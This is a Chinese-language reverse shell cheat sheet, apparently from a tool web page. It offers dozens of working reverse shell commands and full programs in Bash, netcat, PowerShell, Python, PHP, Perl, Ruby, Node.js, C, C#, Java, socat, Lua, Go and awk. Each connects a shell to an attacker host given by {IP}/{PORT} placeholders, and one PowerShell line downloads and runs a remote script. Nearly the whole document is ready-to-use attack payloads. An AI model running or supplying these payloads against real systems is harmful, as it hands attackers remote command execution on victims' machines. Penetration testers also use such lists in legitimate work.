Reverse Shell Cheatsheet
精选 70+ 条原生反向 Shell 命令,涵盖 Bash、Netcat、PowerShell、Python、PHP 等多种语言与工具。
Bash 反弹 Shell
经典 Bash 反弹 (最常用)
bash -i >& /dev/tcp/{IP}/{PORT} 0>&1 Bash 196 文件描述符
0<&196;exec 196<>/dev/tcp/{IP}/{PORT}; bash <&196 >&196 2>&196 Bash read line 循环
exec 5<>/dev/tcp/{IP}/{PORT};cat <&5 | while read line; do $line 2>&5 >&5; done Bash 5 文件描述符
bash -i 5<> /dev/tcp/{IP}/{PORT} 0<&5 1>&5 2>&5 Bash UDP 反弹
bash -i >& /dev/udp/{IP}/{PORT} 0>&1 Netcat 系列
nc mkfifo (无 -e 参数)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc {IP} {PORT} >/tmp/f nc -e (Linux/Mac)
nc -e /bin/bash {IP} {PORT} nc.exe -e (Windows)
nc.exe -e cmd.exe {IP} {PORT} nc -c (部分版本)
nc -c /bin/bash {IP} {PORT} ncat (Linux/Mac)
ncat {IP} {PORT} -e /bin/bash ncat.exe (Windows)
ncat.exe {IP} {PORT} -e cmd.exe ncat UDP 反弹
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|ncat -u {IP} {PORT} >/tmp/f rustcat (现代化替代)
rcat {IP} {PORT} -r /bin/bash PowerShell (Windows)
PowerShell #1 (经典)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{IP}",{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() PowerShell #2 (紧凑)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('{IP}',{PORT});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" PowerShell #3 (StreamWriter)
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('{IP}', {PORT});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()" Windows ConPty (伪终端)
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {IP} {PORT} Python 反弹 Shell
Python #1 (伪终端)
export RHOST="{IP}";export RPORT={PORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")' Python #2 (紧凑)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' Python3 #1 (伪终端)
export RHOST="{IP}";export RPORT={PORT};python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")' Python3 #2 (紧凑)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' Python3 最短版本
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{IP}",{PORT}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")' PHP 反弹 Shell
PHP exec (单行)
php -r '$sock=fsockopen("{IP}",{PORT});exec("/bin/sh -i <&3 >&3 2>&3");' PHP shell_exec
php -r '$sock=fsockopen("{IP}",{PORT});shell_exec("/bin/sh -i <&3 >&3 2>&3");' PHP system
php -r '$sock=fsockopen("{IP}",{PORT});system("/bin/sh -i <&3 >&3 2>&3");' PHP passthru
php -r '$sock=fsockopen("{IP}",{PORT});passthru("/bin/sh -i <&3 >&3 2>&3");' PHP 反引号执行
php -r '$sock=fsockopen("{IP}",{PORT});`/bin/sh -i <&3 >&3 2>&3`;' PHP popen
php -r '$sock=fsockopen("{IP}",{PORT});popen("/bin/sh -i <&3 >&3 2>&3", "r");' PHP proc_open
php -r '$sock=fsockopen("{IP}",{PORT});$proc=proc_open("/bin/sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' Perl 反弹 Shell
Perl (经典)
perl -e 'use Socket;$i="{IP}";$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Perl no sh (无 shell 依赖)
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{IP}:{PORT}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' Ruby 反弹 Shell
Ruby #1 (经典)
ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{IP}",{PORT}))' Ruby no sh (交互式)
ruby -rsocket -e'exit if fork;c=TCPSocket.new("{IP}","{PORT}");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}' Node.js 反弹 Shell
Node.js #1 (调用 nc)
require('child_process').exec('nc -e /bin/bash {IP} {PORT}') Node.js #2 (原生管道)
(function(){var net = require("net"),cp = require("child_process"),sh = cp.spawn("/bin/bash", []);var client = new net.Socket();client.connect({PORT}, "{IP}", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})(); C / C# 反弹 Shell
C Linux/Mac (完整代码)
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = {PORT};
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("{IP}");
connect(sockt, (struct sockaddr *) &revsockaddr, sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
return 0;
} C# Windows (完整代码)
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack {
public class Program {
static StreamWriter streamWriter;
public static void Main(string[] args) {
using(TcpClient client = new TcpClient("{IP}", {PORT})) {
using(Stream stream = client.GetStream()) {
using(StreamReader rdr = new StreamReader(stream)) {
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true) {
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) {
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)) {
try {
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
} catch (Exception err) { }
}
}
}
} Java 反弹 Shell
Java #1 (Runtime.exec)
public class shell {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/{IP}/{PORT} 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
} Java #2 (ProcessBuilder)
public class shell {
public static void main(String[] args) {
ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/{IP}/{PORT} 0>&1")
.redirectErrorStream(true);
try {
Process p = pb.start();
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
} Java #3 (Socket 双向通信)
import java.io.*;
import java.net.*;
public class shell {
public static void main(String[] args) {
String host = "{IP}";
int port = {PORT};
String cmd = "/bin/bash";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush(); po.flush();
Thread.sleep(50);
try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();
} catch (Exception e) {}
}
} 其他工具类
socat #1 (基础)
socat TCP:{IP}:{PORT} EXEC:/bin/bash socat #2 (TTY 伪终端)
socat TCP:{IP}:{PORT} EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane telnet 反弹
TF=$(mktemp -u);mkfifo $TF && telnet {IP} {PORT} 0<$TF | /bin/bash 1>$TF zsh 反弹
zsh -c 'zmodload zsh/net/tcp && ztcp {IP} {PORT} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' Lua #1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('{IP}','{PORT}');os.execute('/bin/bash -i <&3 >&3 2>&3');" Golang (编译运行)
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{IP}:{PORT}");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go Awk 反弹
awk 'BEGIN {s = "/inet/tcp/0/{IP}/{PORT}"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null Zsh (Python 中转)
export RHOST="{IP}";export RPORT={PORT};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("zsh")' 未找到相关命令
试试搜索其他关键字,如 "bash" 或 "python"。